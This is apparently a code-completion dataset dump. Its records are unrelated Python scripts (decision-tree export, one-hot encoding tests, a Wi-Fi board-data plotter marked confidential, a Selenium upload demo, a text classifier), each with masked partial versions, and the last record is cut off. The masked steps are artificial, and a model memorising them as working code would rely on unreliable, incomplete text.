## check_call(['dot','-Tpng',dotfile,'-o',tree_png_file])
(graph,) = pydot.graph_from_dot_file(tree_dot_file)
graph.write_png(tree_png_file)
print("DecisionTree: --- %s seconds ---" % (time.time() - start_time))
"""
PyDot Conversion Complete: --- 3804.3111951351166 seconds ---
"""
|
normal
|
{
"blob_id": "b9678b447bc6e7c4e928ffa6b8cd58639e41a801",
"index": 2688,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nresults_dir.mkdir(parents=True, exist_ok=True)\n<mask token>\nprint(data.shape)\n<mask token>\nprint(\"\"\"\nDataFrame Shape :\"\"\", shape)\nprint(\"\"\"\nNumber of rows :\"\"\", shape[0])\nprint(\"\"\"\nNumber of columns :\"\"\", shape[1])\n<mask token>\ndel amsmodel1['street_address']\namsmodel1.fillna(0, inplace=True)\nprint('Dataframe Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\nwith open(model_file, 'rb') as f:\n rf = pickle.load(f)\nprint('Model Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\nprint(feature_list)\nprint(features)\nprint('Features Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\nexport_graphviz(tree, out_file=dotfile, feature_names=feature_list, rounded\n =True, precision=1)\n<mask token>\ngraph.write_png(tree_png_file)\nprint('DecisionTree: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\n",
"step-3": "<mask token>\nstart_time = time.time()\npd.options.mode.chained_assignment = None\nresults_dir = Path('C:/Alan/DSC680/Project1Data/').joinpath('results')\nresults_dir.mkdir(parents=True, exist_ok=True)\nfilepath = 'C:/Alan/DSC680/Project1Data/FinalLeadAnalyticsRecord2.csv'\ndata = pd.read_csv(filepath)\nprint(data.shape)\nshape = data.shape\nprint(\"\"\"\nDataFrame Shape :\"\"\", shape)\nprint(\"\"\"\nNumber of rows :\"\"\", shape[0])\nprint(\"\"\"\nNumber of columns :\"\"\", shape[1])\namsmodel1 = data\ndel amsmodel1['street_address']\namsmodel1.fillna(0, inplace=True)\nprint('Dataframe Loaded: --- %s seconds ---' % (time.time() - start_time))\nmodel_file = results_dir.joinpath('My3rdModel.pkl')\nwith open(model_file, 'rb') as f:\n rf = pickle.load(f)\nprint('Model Loaded: --- %s seconds ---' % (time.time() - start_time))\ntarget = np.array(amsmodel1['price'])\nfeatures = amsmodel1.drop('price', axis=1)\nfeature_list = list(features.columns)\nfeatures = np.array(features)\nprint(feature_list)\nprint(features)\nprint('Features Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\ntree = rf.estimators_[5]\ntree_dot_file = results_dir.joinpath('tree.dot')\ntree_png_file = results_dir.joinpath('tree.png')\ndotfile = open(tree_dot_file, 'w')\nexport_graphviz(tree, out_file=dotfile, feature_names=feature_list, rounded\n =True, precision=1)\ngraph, = pydot.graph_from_dot_file(tree_dot_file)\ngraph.write_png(tree_png_file)\nprint('DecisionTree: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\n",
"step-4": "<mask token>\nfrom sklearn.tree import export_graphviz\nimport pydot\nimport pickle\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestRegressor\nimport time\nstart_time = time.time()\npd.options.mode.chained_assignment = None\nresults_dir = Path('C:/Alan/DSC680/Project1Data/').joinpath('results')\nresults_dir.mkdir(parents=True, exist_ok=True)\nfilepath = 'C:/Alan/DSC680/Project1Data/FinalLeadAnalyticsRecord2.csv'\ndata = pd.read_csv(filepath)\nprint(data.shape)\nshape = data.shape\nprint(\"\"\"\nDataFrame Shape :\"\"\", shape)\nprint(\"\"\"\nNumber of rows :\"\"\", shape[0])\nprint(\"\"\"\nNumber of columns :\"\"\", shape[1])\namsmodel1 = data\ndel amsmodel1['street_address']\namsmodel1.fillna(0, inplace=True)\nprint('Dataframe Loaded: --- %s seconds ---' % (time.time() - start_time))\nmodel_file = results_dir.joinpath('My3rdModel.pkl')\nwith open(model_file, 'rb') as f:\n rf = pickle.load(f)\nprint('Model Loaded: --- %s seconds ---' % (time.time() - start_time))\ntarget = np.array(amsmodel1['price'])\nfeatures = amsmodel1.drop('price', axis=1)\nfeature_list = list(features.columns)\nfeatures = np.array(features)\nprint(feature_list)\nprint(features)\nprint('Features Loaded: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\ntree = rf.estimators_[5]\ntree_dot_file = results_dir.joinpath('tree.dot')\ntree_png_file = results_dir.joinpath('tree.png')\ndotfile = open(tree_dot_file, 'w')\nexport_graphviz(tree, out_file=dotfile, feature_names=feature_list, rounded\n =True, precision=1)\ngraph, = pydot.graph_from_dot_file(tree_dot_file)\ngraph.write_png(tree_png_file)\nprint('DecisionTree: --- %s seconds ---' % (time.time() - start_time))\n<mask token>\n",
"step-5": "\"\"\"\nAuthor: Alan Danque\nDate: 20210323\nPurpose:Final Data Wrangling, strips html and punctuation.\n\n\"\"\"\nfrom sklearn.tree import export_graphviz\nimport pydot\nimport pickle\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestRegressor\nimport time\nstart_time = time.time()\npd.options.mode.chained_assignment = None # default='warn' # https://stackoverflow.com/questions/20625582/how-to-deal-with-settingwithcopywarning-in-pandas\n\nresults_dir = Path('C:/Alan/DSC680/Project1Data/').joinpath('results')\nresults_dir.mkdir(parents=True, exist_ok=True)\n\nfilepath = \"C:/Alan/DSC680/Project1Data/FinalLeadAnalyticsRecord2.csv\"\ndata = pd.read_csv(filepath)\nprint(data.shape)\nshape = data.shape\nprint('\\nDataFrame Shape :', shape)\nprint('\\nNumber of rows :', shape[0])\nprint('\\nNumber of columns :', shape[1])\n\namsmodel1 = data\ndel amsmodel1['street_address']\namsmodel1.fillna(0, inplace=True)\n#amsmodel1.replace(np.nan,0)\n\nprint(\"Dataframe Loaded: --- %s seconds ---\" % (time.time() - start_time))\n\n\n# load model and predict\nmodel_file = results_dir.joinpath('My3rdModel.pkl')\nwith open(model_file, 'rb') as f:\n rf = pickle.load(f)\n#rf.predict(X[0:1])\n\nprint(\"Model Loaded: --- %s seconds ---\" % (time.time() - start_time))\n\n\ntarget = np.array(amsmodel1['price'])\nfeatures = amsmodel1.drop('price', axis = 1)\nfeature_list = list(features.columns)\nfeatures = np.array(features)\nprint(feature_list)\nprint(features)\nprint(\"Features Loaded: --- %s seconds ---\" % (time.time() - start_time))\n\n\"\"\"\n\nfrom sklearn.model_selection import RandomizedSearchCV\n# Number of trees in random forest\nn_estimators = [int(x) for x in np.linspace(start = 200, stop = 2000, num = 10)]\n# Number of features to consider at every split\nmax_features = ['auto', 'sqrt']\n# Maximum number of levels in tree\nmax_depth = [int(x) for x in np.linspace(10, 110, num = 11)]\nmax_depth.append(None)\n# Minimum number of samples required to split a node\nmin_samples_split = [2, 5, 10]\n# Minimum number of samples required at each leaf node\nmin_samples_leaf = [1, 2, 4]\n# Method of selecting samples for training each tree\nbootstrap = [True, False]\n# Create the random grid\nrandom_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\nprint(random_grid)\nprint(\"Estimators Loaded: --- %s seconds ---\" % (time.time() - start_time))\n\"\"\"\n\n\n# Decision Tree\n\n## SAVING THE DECISION TREE\ntree = rf.estimators_[5]\ntree_dot_file = results_dir.joinpath('tree.dot')\ntree_png_file = results_dir.joinpath('tree.png')\ndotfile = open(tree_dot_file, 'w')\nexport_graphviz(tree, out_file = dotfile, feature_names = feature_list, rounded = True, precision = 1)\n\n# Install https://graphviz.org/download/#windows\n#(graph, ) = pydot.graph_from_dot_file(tree_dot_file)\n#graph.write_png(tree_png_file)\n# C:\\Program Files\\Graphviz\\bin\n# having issues with pydot.graph_from_dot_file. 
Since my dot file is getting created using subprocess.\n## from subprocess import check_call\n## check_call(['dot','-Tpng',dotfile,'-o',tree_png_file])\n\n(graph,) = pydot.graph_from_dot_file(tree_dot_file)\ngraph.write_png(tree_png_file)\n\nprint(\"DecisionTree: --- %s seconds ---\" % (time.time() - start_time))\n\"\"\"\nPyDot Conversion Complete: --- 3804.3111951351166 seconds ---\n\"\"\"\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from typing import List, Tuple
import pytest
def fit_transform(*args: str) -> List[Tuple[str, List[int]]]:
if len(args) == 0:
raise TypeError('expected at least 1 arguments, got 0')
categories = args if isinstance(args[0], str) else list(args[0])
uniq_categories = set(categories)
bin_format = f'{{0:0{len(uniq_categories)}b}}'
seen_categories = dict()
transformed_rows = []
for cat in categories:
bin_view_cat = (int(b) for b in bin_format.format(1 << len(seen_categories)))
seen_categories.setdefault(cat, list(bin_view_cat))
transformed_rows.append((cat, seen_categories[cat]))
return transformed_rows
def test_str_fit_transformr():
assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [
('Moscow', [0, 0, 1]),
('New York', [0, 1, 0]),
('Moscow', [0, 0, 1]),
('London', [1, 0, 0]),
]
def test_int_fit_str_transformr():
assert fit_transform([1, 2, 1, 3]) == [
(1, [0, 0, 1]),
(2, [0, 1, 0]),
(1, [0, 0, 1]),
(3, [1, 0, 0]),
]
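# Additional worked example (sketch): varargs of plain strings are also accepted;
# with two unique categories the bit width is 2, so 'a' -> [0, 1] and 'b' -> [1, 0].
def test_varargs_fit_transform():
    assert fit_transform('a', 'b', 'a') == [
        ('a', [0, 1]),
        ('b', [1, 0]),
        ('a', [0, 1]),
    ]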
# to check that the code raises an exception, use the pytest.raises context manager
def test_error_type_fit_transformr():
with pytest.raises(TypeError):
fit_transform(1)
@pytest.fixture()
def randomize():
from random import randint
return [randint(0, 9) for _ in range(randint(0, 10))]
def test_intv2_fit_transformr(randomize):
print(randomize)
result = fit_transform(randomize)
assert (len(result) == len(randomize))
|
normal
|
{
"blob_id": "b236abaa5e206a8244083ee7f9dcdb16741cb99d",
"index": 3072,
"step-1": "<mask token>\n\n\ndef test_str_fit_transformr():\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [(\n 'Moscow', [0, 0, 1]), ('New York', [0, 1, 0]), ('Moscow', [0, 0, 1]\n ), ('London', [1, 0, 0])]\n\n\ndef test_int_fit_str_transformr():\n assert fit_transform([1, 2, 1, 3]) == [(1, [0, 0, 1]), (2, [0, 1, 0]),\n (1, [0, 0, 1]), (3, [1, 0, 0])]\n\n\n<mask token>\n\n\n@pytest.fixture()\ndef randomize():\n from random import randint\n return [randint(0, 9) for _ in range(randint(0, 10))]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_str_fit_transformr():\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [(\n 'Moscow', [0, 0, 1]), ('New York', [0, 1, 0]), ('Moscow', [0, 0, 1]\n ), ('London', [1, 0, 0])]\n\n\ndef test_int_fit_str_transformr():\n assert fit_transform([1, 2, 1, 3]) == [(1, [0, 0, 1]), (2, [0, 1, 0]),\n (1, [0, 0, 1]), (3, [1, 0, 0])]\n\n\ndef test_error_type_fit_transformr():\n with pytest.raises(TypeError):\n fit_transform(1)\n\n\n@pytest.fixture()\ndef randomize():\n from random import randint\n return [randint(0, 9) for _ in range(randint(0, 10))]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef fit_transform(*args: str) ->List[Tuple[str, List[int]]]:\n if len(args) == 0:\n raise TypeError('expected at least 1 arguments, got 0')\n categories = args if isinstance(args[0], str) else list(args[0])\n uniq_categories = set(categories)\n bin_format = f'{{0:0{len(uniq_categories)}b}}'\n seen_categories = dict()\n transformed_rows = []\n for cat in categories:\n bin_view_cat = (int(b) for b in bin_format.format(1 << len(\n seen_categories)))\n seen_categories.setdefault(cat, list(bin_view_cat))\n transformed_rows.append((cat, seen_categories[cat]))\n return transformed_rows\n\n\ndef test_str_fit_transformr():\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [(\n 'Moscow', [0, 0, 1]), ('New York', [0, 1, 0]), ('Moscow', [0, 0, 1]\n ), ('London', [1, 0, 0])]\n\n\ndef test_int_fit_str_transformr():\n assert fit_transform([1, 2, 1, 3]) == [(1, [0, 0, 1]), (2, [0, 1, 0]),\n (1, [0, 0, 1]), (3, [1, 0, 0])]\n\n\ndef test_error_type_fit_transformr():\n with pytest.raises(TypeError):\n fit_transform(1)\n\n\n@pytest.fixture()\ndef randomize():\n from random import randint\n return [randint(0, 9) for _ in range(randint(0, 10))]\n\n\ndef test_intv2_fit_transformr(randomize):\n print(randomize)\n result = fit_transform(randomize)\n assert len(result) == len(randomize)\n",
"step-4": "from typing import List, Tuple\nimport pytest\n\n\ndef fit_transform(*args: str) ->List[Tuple[str, List[int]]]:\n if len(args) == 0:\n raise TypeError('expected at least 1 arguments, got 0')\n categories = args if isinstance(args[0], str) else list(args[0])\n uniq_categories = set(categories)\n bin_format = f'{{0:0{len(uniq_categories)}b}}'\n seen_categories = dict()\n transformed_rows = []\n for cat in categories:\n bin_view_cat = (int(b) for b in bin_format.format(1 << len(\n seen_categories)))\n seen_categories.setdefault(cat, list(bin_view_cat))\n transformed_rows.append((cat, seen_categories[cat]))\n return transformed_rows\n\n\ndef test_str_fit_transformr():\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [(\n 'Moscow', [0, 0, 1]), ('New York', [0, 1, 0]), ('Moscow', [0, 0, 1]\n ), ('London', [1, 0, 0])]\n\n\ndef test_int_fit_str_transformr():\n assert fit_transform([1, 2, 1, 3]) == [(1, [0, 0, 1]), (2, [0, 1, 0]),\n (1, [0, 0, 1]), (3, [1, 0, 0])]\n\n\ndef test_error_type_fit_transformr():\n with pytest.raises(TypeError):\n fit_transform(1)\n\n\n@pytest.fixture()\ndef randomize():\n from random import randint\n return [randint(0, 9) for _ in range(randint(0, 10))]\n\n\ndef test_intv2_fit_transformr(randomize):\n print(randomize)\n result = fit_transform(randomize)\n assert len(result) == len(randomize)\n",
"step-5": "from typing import List, Tuple\r\nimport pytest\r\n\r\n\r\ndef fit_transform(*args: str) -> List[Tuple[str, List[int]]]:\r\n if len(args) == 0:\r\n raise TypeError('expected at least 1 arguments, got 0')\r\n\r\n categories = args if isinstance(args[0], str) else list(args[0])\r\n uniq_categories = set(categories)\r\n bin_format = f'{{0:0{len(uniq_categories)}b}}'\r\n\r\n seen_categories = dict()\r\n transformed_rows = []\r\n\r\n for cat in categories:\r\n bin_view_cat = (int(b) for b in bin_format.format(1 << len(seen_categories)))\r\n seen_categories.setdefault(cat, list(bin_view_cat))\r\n transformed_rows.append((cat, seen_categories[cat]))\r\n\r\n return transformed_rows\r\n\r\n\r\ndef test_str_fit_transformr():\r\n assert fit_transform(['Moscow', 'New York', 'Moscow', 'London']) == [\r\n ('Moscow', [0, 0, 1]),\r\n ('New York', [0, 1, 0]),\r\n ('Moscow', [0, 0, 1]),\r\n ('London', [1, 0, 0]),\r\n ]\r\n\r\n\r\ndef test_int_fit_str_transformr():\r\n assert fit_transform([1, 2, 1, 3]) == [\r\n (1, [0, 0, 1]),\r\n (2, [0, 1, 0]),\r\n (1, [0, 0, 1]),\r\n (3, [1, 0, 0]),\r\n ]\r\n\r\n\r\n# чтобы проверить, что код вызывает исключение, нужно использовать менеджер контекста pytest.raises\r\ndef test_error_type_fit_transformr():\r\n with pytest.raises(TypeError):\r\n fit_transform(1)\r\n\r\n\r\n@pytest.fixture()\r\ndef randomize():\r\n from random import randint\r\n return [randint(0, 9) for _ in range(randint(0, 10))]\r\n\r\n\r\ndef test_intv2_fit_transformr(randomize):\r\n print(randomize)\r\n result = fit_transform(randomize)\r\n assert (len(result) == len(randomize))\r\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
#!/usr/bin/python
#===============================================================================
#
# Board Data File Analyzer
#
# Copyright (c) 2017 by QUALCOMM Atheros, Incorporated.
# All Rights Reserved
# QUALCOMM Atheros Confidential and Proprietary
#
# Notifications and licenses are retained for attribution purposes only
#===============================================================================
#--------------
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui, QtCore  # QtCore is needed for the PYQT_VERSION check below
from array import array
import numpy as np
Description = """
[Description]:
Read WLAN board data file and generate graph per chain.
1 2 3 4
fullmeas_pwr_0_G_0_0
fullmeas_pwr_0_A_0_0
1. Index/Step: an iteration takes 10 steps
2. Band: 'G' is 2.4G and 'A' is 5G.
3. Channel: 14 channels for 2.4G and 32 channels for 5G.
4. Chain: Either chain0 or chain1.
[Input]:
BIN/wlan_proc/wlan/halphy_tools/host/bdfUtil/qca61x0/bdf
[Usage]:
BDFAnalyzer.py input.txt
"""
fullpdadc_val_list = [] # y-axis
fullpwr_val_list = [] # x-axis
fullpwr_tag_list = []
win = pg.GraphicsWindow(title="Chain Analyzer: chain 0 (RED) chain 1 (GREEN)")
win.resize(1000,600)
def backup_calibration(fin):
for index in range(len(fullpwr_tag_list)):
fin.write(fullpwr_tag_list[index])
fin.write(" ")
fin.write(fullpwr_val_list[index])
fin.write(",")
fin.write(fullpdadc_val_list[index])
fin.write("\n")
def plot_render(band, channel):
index_lower = 0
index_upper = 0
X = []
Y = []
if band == "G": # 2.4G
index_lower = channel * 20
index_upper = (channel+1) * 20
elif band == "A": # 5G
index_lower = 280 + channel * 20
index_upper = 280 + (channel+1) * 20
else:
print "Plot render error\n"
for i in range(index_lower, index_upper):
X.append(int(fullpwr_val_list[i], 10))
Y.append(int(fullpdadc_val_list[i], 10))
title_description = "Channel " + str(channel)
pp = win.addPlot(title = title_description)
pp.plot(X[0:10],Y[0:10], title="Chain 0", pen=(255,0,0)) # chain 0 as red line
pp.plot(X[10:20],Y[10:20], title="Chain 1", pen=(0,255,0)) # chain 1 as green line
pp.showGrid(x=True, y=True)
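# Worked example (illustrative): plot_render('A', 7) covers list rows
# 280 + 7*20 = 420 .. 440; the first 10 points are chain 0 (red), the next 10 chain 1 (green).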
def main():
global fullpwr_tag_list, fullpwr_val_list, fullpdadc_val_list
clpc = open("files/calibration.txt","w")
bdf = open("files/bdwlan30.txt",'r')
# read data
for line in bdf:
if "fullpdadc" in line:
tmp = line.split()
fullpdadc_val_list.append(tmp[1])
if "fullmeas_pwr" in line:
tmp = line.split()
fullpwr_tag_list.append(tmp[0])
fullpwr_val_list.append(tmp[1])
# write calibration backup file
backup_calibration(clpc)
bdf.close()
clpc.close()
# draw plot
plot_render('A', 7)
plot_render('A', 8)
win.nextRow()
plot_render('A', 9)
plot_render('A', 10)
if __name__ == '__main__':
	import sys
	main()
	if sys.flags.interactive != 1 or not hasattr(QtCore, 'PYQT_VERSION'):
		QtGui.QApplication.exec_()
|
normal
|
{
"blob_id": "5c12ff4f88af991fa275cd08adf3678ee4a678f3",
"index": 8532,
"step-1": "#!/usr/bin/python\n#===============================================================================\n#\n# Board Data File Analyzer\n#\n# Copyright (c) 2017 by QUALCOMM Atheros, Incorporated.\n# All Rights Reserved\n# QUALCOMM Atheros Confidential and Proprietary\n#\n# Notifications and licenses are retained for attribution purposes only\n#===============================================================================\n\n#--------------\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtGui\nfrom array import array\nimport numpy as np\n\nDescription = \"\"\"\n[Description]:\nRead WLAN board data file and generate graph per chain.\n 1 2 3 4\nfullmeas_pwr_0_G_0_0\nfullmeas_pwr_0_A_0_0\n\n1. Index/Step: a iteration takes 10 steps\n2. Band: 'G' is 2.4G and 'A' is 5G.\n3. Channel: 14 channels for 2.4G and 32 channels for 5G.\n4. Chain: Either chain0 or chain1.\n\n[Input]:\nBIN/wlan_proc/wlan/halphy_tools/host/bdfUtil/qca61x0/bdf\n[Usage]:\nBDFAnalyzer.py input.txt\n\"\"\"\n\nfullpdadc_val_list = [] # y-axis\nfullpwr_val_list = [] # x-axis\nfullpwr_tag_list = [] \n\nwin = pg.GraphicsWindow(title=\"Chain Analyzer: chain 0 (RED) chain 1 (GREEN)\")\nwin.resize(1000,600)\ndef backup_calibration(fin):\n\tfor index in range(len(fullpwr_tag_list)):\n\t\tfin.write(fullpwr_tag_list[index])\n\t\tfin.write(\" \")\n\t\tfin.write(fullpwr_val_list[index])\n\t\tfin.write(\",\")\n\t\tfin.write(fullpdadc_val_list[index])\n\t\tfin.write(\"\\n\")\n\ndef plot_render(band, channel):\n\tindex_lower = 0\n\tindex_upper = 0\n\tX = []\n\tY = []\n\tif band == \"G\": # 2.4G\n\t\tindex_lower = channel * 20\n\t\tindex_upper = (channel+1) * 20 \n\telif band == \"A\": # 5G\n\t\tindex_lower = 280 + channel * 20\n\t\tindex_upper = 280 + (channel+1) * 20 \n\telse:\n\t\tprint \"Plot render error\\n\"\n\t\n\tfor i in range(index_lower, index_upper):\n\t\tX.append(int(fullpwr_val_list[i], 10))\n\t\tY.append(int(fullpdadc_val_list[i], 10))\n\n\ttitle_description = \"Channel \" + str(channel)\n\tpp = win.addPlot(title = title_description)\n\tpp.plot(X[0:10],Y[0:10], title=\"Chain 0\", pen=(255,0,0)) # chain 0 as red line\n\tpp.plot(X[10:20],Y[10:20], title=\"Chain 1\", pen=(0,255,0)) # chain 1 as green line\n\tpp.showGrid(x=True, y=True)\n\t\t\n\ndef main():\n\tglobal fullpwr_tag_list, fullpwr_val_list, fullpdadc_val_list\n\tclpc = open(\"files/calibration.txt\",\"w\")\n\tbdf = open(\"files/bdwlan30.txt\",'r')\n\t# read data\n\tfor line in bdf:\n\t\tif \"fullpdadc\" in line:\n\t\t\ttmp = line.split()\n\t\t\tfullpdadc_val_list.append(tmp[1])\n\t\tif \"fullmeas_pwr\" in line:\n\t\t\ttmp = line.split()\n\t\t\tfullpwr_tag_list.append(tmp[0])\n\t\t\tfullpwr_val_list.append(tmp[1])\n\n\t# write calibration backup file\n\tbackup_calibration(clpc)\n\tbdf.close()\n\tclpc.close()\n\t# draw plot\n\tplot_render('A', 7)\n\tplot_render('A', 8)\n\twin.nextRow()\n\tplot_render('A', 9)\n\tplot_render('A', 10)\n\tif __name__ == '__main__':\n\t\timport sys\n\t\tif sys.flags.interactive != 1 or not hasattr(QtCore, 'PYQT_VERSION'):\n\t\t\tQtGui.QApplication.exec_()\n\nmain()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if k2 >= k:
print(' Yes, the scene can be set.')
else:
print(" Sorry, but the scene can't be set.")
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s = int(input('Input your area of square (S): '))
r = int(input('Input your radius of scene (R): '))
k = int(input('Input your width of passage (K): '))
k2 = sqrt(s) / 2 - r
if k2 >= k:
print(' Yes, the scene can be set.')
else:
print(" Sorry, but the scene can't be set.")
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from math import sqrt
s = int(input('Input your area of square (S): '))
r = int(input('Input your radius of scene (R): '))
k = int(input('Input your width of passage (K): '))
k2 = sqrt(s) / 2 - r
if k2 >= k:
print(' Yes, the scene can be set.')
else:
print(" Sorry, but the scene can't be set.")
<|reserved_special_token_1|>
'''Can a circular stage of radius R be placed in a square hall of area S
so that there is a passage of at least K between the wall and the stage?'''
from math import sqrt
s = int(input('Input your area of square (S): '))
r = int(input('Input your radius of scene (R): '))
k = int(input('Input your width of passage (K): '))
k2 = sqrt(s) / 2 - r
if k2 >= k:
print(" Yes, the scene can be set.")
else:
print(" Sorry, but the scene can't be set.")
|
flexible
|
{
"blob_id": "31a2fa5b2febc2ef80b57e45c2ebb662b886c4b7",
"index": 6043,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif k2 >= k:\n print(' Yes, the scene can be set.')\nelse:\n print(\" Sorry, but the scene can't be set.\")\n",
"step-3": "<mask token>\ns = int(input('Input your area of square (S): '))\nr = int(input('Input your radius of scene (R): '))\nk = int(input('Input your width of passage (K): '))\nk2 = sqrt(s) / 2 - r\nif k2 >= k:\n print(' Yes, the scene can be set.')\nelse:\n print(\" Sorry, but the scene can't be set.\")\n",
"step-4": "<mask token>\nfrom math import sqrt\ns = int(input('Input your area of square (S): '))\nr = int(input('Input your radius of scene (R): '))\nk = int(input('Input your width of passage (K): '))\nk2 = sqrt(s) / 2 - r\nif k2 >= k:\n print(' Yes, the scene can be set.')\nelse:\n print(\" Sorry, but the scene can't be set.\")\n",
"step-5": "'''Чи можна в квадратному залі площею S помістити круглу сцену радіусом R так,\r\nщоб від стіни до сцени був прохід не менше K?'''\r\nfrom math import sqrt\r\n\r\ns = int(input('Input your area of square (S): '))\r\nr = int(input('Input your radius of scene (R): '))\r\nk = int(input('Input your width of passage (K): '))\r\nk2 = sqrt(s) / 2 - r\r\nif k2 >= k:\r\n print(\" Yes, the scene can be set.\")\r\nelse:\r\n print(\" Sorry, but the scene can't be set.\")\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
driver.get(upload_page)
driver.find_element_by_id('inputfile').send_keys(file_path + '\\test.txt')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
file_path = os.path.abspath('./files//')
driver = webdriver.Firefox()
upload_page = 'file:///' + file_path + '/upfile.html'
driver.get(upload_page)
driver.find_element_by_id('inputfile').send_keys(file_path + '\\test.txt')
<|reserved_special_token_1|>
import os
from selenium import webdriver
file_path = os.path.abspath('./files//')
driver = webdriver.Firefox()
upload_page = 'file:///' + file_path + '/upfile.html'
driver.get(upload_page)
driver.find_element_by_id('inputfile').send_keys(file_path + '\\test.txt')
<|reserved_special_token_1|>
# Upload a file
import os
from selenium import webdriver
# Get the "files" folder under the current path
file_path = os.path.abspath("./files//")
# Open the folder's upfile.html page in the browser
driver = webdriver.Firefox()
upload_page = "file:///" + file_path + "/upfile.html"
driver.get(upload_page)
# Locate the upload control and attach the local file
driver.find_element_by_id("inputfile").send_keys(file_path + "\\test.txt")
|
flexible
|
{
"blob_id": "9e28fa1f221df13f9cc8e6b71586da961ebdc0e0",
"index": 4580,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndriver.get(upload_page)\ndriver.find_element_by_id('inputfile').send_keys(file_path + '\\\\test.txt')\n",
"step-3": "<mask token>\nfile_path = os.path.abspath('./files//')\ndriver = webdriver.Firefox()\nupload_page = 'file:///' + file_path + '/upfile.html'\ndriver.get(upload_page)\ndriver.find_element_by_id('inputfile').send_keys(file_path + '\\\\test.txt')\n",
"step-4": "import os\nfrom selenium import webdriver\nfile_path = os.path.abspath('./files//')\ndriver = webdriver.Firefox()\nupload_page = 'file:///' + file_path + '/upfile.html'\ndriver.get(upload_page)\ndriver.find_element_by_id('inputfile').send_keys(file_path + '\\\\test.txt')\n",
"step-5": "# 上传文件\n\nimport os\nfrom selenium import webdriver\n\n# 获取当前路径的 “files” 文件夹\nfile_path = os.path.abspath(\"./files//\")\n\n# 浏览器打开文件夹的 upfile.html 文件\ndriver = webdriver.Firefox()\nupload_page = \"file:///\" + file_path + \"/upfile.html\"\ndriver.get(upload_page)\n\n# 定位上传按钮,添加本地文件\ndriver.find_element_by_id(\"inputfile\").send_keys(file_path + \"\\\\test.txt\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(forbidpath, 'rb') as f:
for line in f:
word = line.strip()
forbidkword[word] = 0
<|reserved_special_token_0|>
with open(inputpath, 'rb') as f:
for line in f:
splits = line.strip().split('\t')
tag = splits[0]
if tag.find(label) > -1:
print(tag)
train = []
seg = jieba_cut.cut(splits[-1], cut_all=False)
seglist = []
for w in seg:
w = w.strip().encode('utf-8')
if w not in forbidkword:
if not re.match('\\d+$', w):
seglist.append(w)
train.append(' '.join(seglist))
X_test = vectorizer.transform(train)
X_test = chi2.transform(X_test)
pred = clf.predict(X_test)
print(pred)
lb = str(pred[0])
if lb == '1':
outfile.writelines(line.strip() + '\t')
outfile.writelines(lb + '\n')
outfile.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
outputfile = 'dzsptfidf'
X_train, y_train = cPickle.load(open(os.path.join(outputfile, 'train.data'),
'rb'))
X_test, y_test = cPickle.load(open(os.path.join(outputfile, 'test.data'), 'rb')
)
vectorizer = cPickle.load(open(os.path.join(outputfile, 'vectorizer.data'),
'rb'))
chi2 = cPickle.load(open(os.path.join(outputfile, 'ch2.data'), 'rb'))
clf = cPickle.load(open(os.path.join(outputfile, 'SGD_l2.model'), 'rb'))
inputpath = u'E:\\项目需求\\JDPower\\分类\\5月份\\financeoutput1_final_05.txt'
outputpath = u'E:\\项目需求\\JDPower\\分类\\5月份\\大宗商品.txt'
label = '大宗商品'
forbidkword = {}
forbidpath = u'..//keyword.txt'
with open(forbidpath, 'rb') as f:
for line in f:
word = line.strip()
forbidkword[word] = 0
outfile = open(outputpath, 'wb')
with open(inputpath, 'rb') as f:
for line in f:
splits = line.strip().split('\t')
tag = splits[0]
if tag.find(label) > -1:
print(tag)
train = []
seg = jieba_cut.cut(splits[-1], cut_all=False)
seglist = []
for w in seg:
w = w.strip().encode('utf-8')
if w not in forbidkword:
if not re.match('\\d+$', w):
seglist.append(w)
train.append(' '.join(seglist))
X_test = vectorizer.transform(train)
X_test = chi2.transform(X_test)
pred = clf.predict(X_test)
print(pred)
lb = str(pred[0])
if lb == '1':
outfile.writelines(line.strip() + '\t')
outfile.writelines(lb + '\n')
outfile.close()
<|reserved_special_token_1|>
from __future__ import print_function
import logging
import numpy as np
from optparse import OptionParser
import sys
from time import time
import matplotlib.pyplot as plt
import os
